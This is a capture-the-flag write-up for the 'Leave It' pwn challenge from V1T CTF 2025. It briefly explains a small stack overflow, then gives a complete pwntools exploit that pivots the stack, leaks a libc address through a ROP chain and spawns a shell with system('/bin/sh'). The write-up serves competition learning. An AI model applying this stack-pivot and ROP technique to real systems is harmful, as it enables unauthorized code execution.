
2025-6

Challenge information

  • CTF: V1T CTF 2025

  • Challenge: Leave It

  • Solves: 40

  • Description: Please Leave me Alone : (

  • Time to solve: 20 min

Writeup

Obviously a 0x12-byte overflow.

Screenshot_20251104_220343.png

In this challenge we can leak a stack address from printf(format: "This may help: %p\n", &buf); however, I tried to exploit it without using that leak, to sharpen my pwn skills.

Exploit strategy:

  1. stack pivot to a writable address

  2. chain a ROP payload through the leave;ret gadget to leak a libc address.

  3. chain a final ROP payload to get a shell.

from pwn import *
from icecream import ic
import sys

# Challenge binary, the libc it ships with, and its loader.
# NOTE(review): `ld` is loaded but never referenced below.
e = ELF("chall",checksec=False)
libc = ELF("libc.so.6",checksec=False)
ld = ELF("ld-linux-x86-64.so.2",checksec=False)

# Connection string, parsed into HOST/PORT below. If it matches neither the
# "nc host port" nor the "http..." form, HOST/PORT are never bound and the
# remote() call further down raises NameError.
nc = "nc 127.0.0.1 9999"
if "nc" in nc:
    HOST = nc.split(" ")[1]
    PORT = int(nc.split(" ")[2])
if "http" in nc:
    from urllib.parse import urlparse
    HOST = urlparse(nc).hostname
    PORT = urlparse(nc).port

# Non-zero attaches gdb to the locally spawned process with g_script.
dbg = 1
g_script = """
#set max-visualize-chunk-size 0x300
"""
context.binary = e

# Any command-line argument selects the remote target; otherwise run locally.
if len(sys.argv) > 1:
    io = remote(host=HOST,port=PORT)
else:
    io = e.process()
    # NOTE(review): the page shows this script collapsed onto one line; the
    # nesting of the gdb.attach() under the local branch is reconstructed here.
    if dbg:
        gdb.attach(io,g_script)

# Short aliases for the pwntools tube API.
s = lambda b: io.send(b)
sa = lambda a,b: io.sendafter(a,b)
sl = lambda b: io.sendline(b)
sln = lambda b: io.sendline(str(b).encode())
sla = lambda a,b: io.sendlineafter(a,b)
r = lambda : io.recv()
ru = lambda b:io.recvuntil(b)
rl = lambda : io.recvline()
# Unpack a leak shorter than the word size by zero-padding it on the right.
pu32= lambda b : u32(b.ljust(4,b"\0"))
pu64= lambda b : u64(b.ljust(8,b"\0"))
hlog= lambda i : print(f"[*]{hex(i)}")
# Format-string probe builder (unused in this exploit).
fsp = lambda b : f"%{b}$p".encode()
shell = lambda : io.interactive()

# Global payload buffer: pay() appends to it, rst() clears it.
payload = b""
def rst():global payload;payload = b""
def pay(*args, **kwargs):
    """Append each positional arg to the global payload.

    bytes are appended as-is, str is encoded, and anything else is packed as
    a little-endian 8-byte word with p64(). kwargs are accepted but ignored.
    """
    global payload
    payload += b"".join([a if type(a) == bytes else (a.encode() if type(a) == str else p64(a)) for a in args])

# Gadget addresses in the (non-PIE) challenge binary, as given on the page.
# ret2vuln: presumably a point inside the vulnerable function after its
# prologue, so re-entering it keeps the pivoted rbp — confirm in a debugger.
ret2vuln = 0x00401225
pop_rdi = 0x00401214
pop_rbp = 0x00401281
leave_ret = 0x00401259
# Scratch area inside the binary's writable segment used as the fake stack.
writable = 0x0000000000405000 - 0x800
ret = 0x00401290

# Stage 1: fill the 0x60-byte buffer, overwrite the saved rbp with
# writable+0x60 and return into the vulnerable function. On re-entry the
# buffer is addressed relative to rbp, so the next input lands at `writable`
# (assumes buf sits at rbp-0x60, consistent with the 0x60 filler — verify).
rst()
pay( b"A"*0x60, writable+0x60, ret2vuln )
ic(payload)
ic(hex(len(payload)))
sl(payload)

# Stage 2: write a leak chain at `writable`, then pivot onto it.
#   writable+0x00: writable+0x60   (popped into rbp by leave_ret)
#   writable+0x08: pop_rdi ; puts@got ; puts@plt   -> prints puts' address
#   writable+0x20: ret2vuln        (back into the vulnerable function)
#   filler "B" up to 0x60, then saved rbp = writable, ret = leave_ret
# The function epilogue's leave sets rbp=writable and returns into leave_ret,
# which moves rsp to writable, pops rbp=writable+0x60 and returns to pop_rdi.
rst()
pay(
    writable+0x60,
    pop_rdi,
    e.got['puts'],
    e.plt['puts'],
    ret2vuln,
)
payload = payload.ljust(0x60,b"B")
pay( writable, leave_ret )
sl(payload)

# Skip the lines the program prints before puts' output (count taken from
# the original run; presumably the prompt/banner).
ic(rl())
ic(rl())
ic(rl())
leak = (rl()).strip()
leak = pu64(leak)
ic(hex(leak))
# Libc base = leaked puts address - puts' offset inside libc. The offset is
# hard-coded from a debugging session (0x7996a4687be0 - 0x7996a4600000 =
# 0x87be0); it must equal libc.symbols['puts'] for the libc actually running,
# so a mismatched libc.so.6 yields a wrong base.
libc.address = leak - (0x7996a4687be0 - 0x00007996a4600000)
ic(hex(libc.address))

# Stage 3: final chain, written at `writable` again (rbp is still
# writable+0x60 after stage 2's ret2vuln).
#   writable+0x00: writable+0x60
#   writable+0x08: ret             (presumably for stack alignment)
#   writable+0x10: pop_rbp ; writable
#   writable+0x20: pop_rdi ; "/bin/sh" ; system
#   `ret` padding up to 0x60-0x10, then pop_rbp ; writable+8 ; leave_ret
# The trailing pop_rbp/leave_ret pair is intended to pivot rsp back to
# writable+8 so the chain runs from `ret` down to system("/bin/sh"). The
# exact pivot depends on what stage 2 left at writable+0x68 — confirm in gdb.
rst()
pay(
    writable+0x60,
    ret,
    pop_rbp,
    writable,
    pop_rdi,
    next(libc.search(b"/bin/sh")),
    libc.symbols['system'],
)
payload += p64(ret)*((0x60 - len(payload))//8-2)
pay( pop_rbp, writable+8, leave_ret )
ic(hex(len(payload)))
sl(payload)
shell()